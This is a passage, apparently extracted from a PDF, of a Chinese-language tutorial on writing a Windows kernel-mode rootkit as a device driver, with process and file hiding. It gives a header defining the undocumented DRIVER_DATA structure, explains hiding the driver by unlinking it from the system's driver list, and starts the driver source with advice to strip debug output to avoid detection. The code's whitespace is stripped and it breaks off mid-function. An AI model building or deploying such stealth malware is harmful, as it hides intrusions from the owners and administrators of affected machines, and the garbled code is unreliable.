Rootkit隐形技术方法 .pdfVIP

Rootkit隐形技术方法

一、综述

本文将引领读者打造一个初级的内核级Rootkit，然后为其引入

两种简单的隐形技术：进程隐形技术和文件隐形技术。同时，为了

让读者获得rootkit编程的相关经验，我们顺便介绍了rootkit的

装载、卸载方法，以及必不可少的测试技术。

本文介绍的Rootkit的主要构件是一个设备驱动程序，所以我们

首先了解一下我们的第一个rootkit。

二、rootkit主体

本节引入一个简单的rootkit实例，它实际上只给出了rootkit

的主体框架，换句话说，就是一个设备驱动程序。那么为什么要用

设备驱动程序作为主体呢？很明显，因为在系统中，设备驱动程序

和操作系统一样，都是程序中的特权阶级——它们运行于Ring0，

有权访问系统中的所有代码和数据。还有一点需要说明的是，因为

本例主要目的在于介绍rootkit是如何隐形的，所以并没有实现后

门之类的具体功能，。

我们将以源代码的形式说明rootkit，对着重介绍一些重要的数

据结构和函数。下面，先给出我们用到的第一个文件，它是一个头

文件，名为Invisible.h，具体如下所示：

//Invisible.h：我们rootkit的头文件

#ifndef_INVISIBLE_H_

#define_INVISIBLE_H_

typedefBOOLEANBOOL;

typedefunsignedlongDWORD;

typedefDWORD*PDWORD;

typedefunsignedlongULONG;

typedefunsignedshortWORD;

typedefunsignedcharBYTE;

typedefstruct_DRIVER_DATA

{

LIST_ENTRYlistEntry;

DWORDunknown1;

DWORDunknown2;

DWORDunknown3;

DWORDunknown4;

DWORDunknown5;

DWORDunknown6;

DWORDunknown7;

UNICODE_STRINGpath;

UNICODE_STRINGname;

}DRIVER_DATA;

#endif

我们知道，应用软件只要简单引用几个文件如stdio.h和

windows.h，就能囊括大量的定义。但这种做法到了驱动程序这里就

行不通了，原因大致有二条，一是驱动程序体积一般较为紧凑，二

是驱动程序用途较为专一，用到的数据类型较少。因此，我们这里

给出了一个头文件Invisible.h，其中定义了一些供我们的rootkit

之用的数据类型。

这里定义的类型中，有一个数据类型要提一下：双字类型，它实

际上是一个无符号长整型。此外，DRIVER_DATA是Windows操作系

统未公开的一个数据结构，其中含有分别指向设备驱动程序目录中

上一个和下一个设备驱动程序的指针。而我们这里开发的rootkit

恰好就是作为设备驱动程序来实现，所以，只要从设备驱动程序目

录中将我们的rootkit（即驱动程序）所对应的目录项去掉，系统

管理程序就看不到它了，从而实现了隐形。

上面介绍了rootkit的头文件，现在开始介绍rootkit的主体部

分，它实际就是一个基本的设备驱动程序，具体代码如下面的

Invisible.c所示：

//Invisible

#includentddk.h

#includeInvisible.h

#includefileManager.h

#includeconfigManager.h

//全局变量

ULONGmajorVersion;

ULONGminorVersion;

//当进行freebuild时，将其注释掉，以防被检测到

VOIDOnUnload(INPDRIVER_OBJECTpDriverObject)

{

DbgPrint(comint16:OnUnloadcalled.);

}

NTSTATUSDriverEntry(INPDRIVER_OBJECTpDriverObjec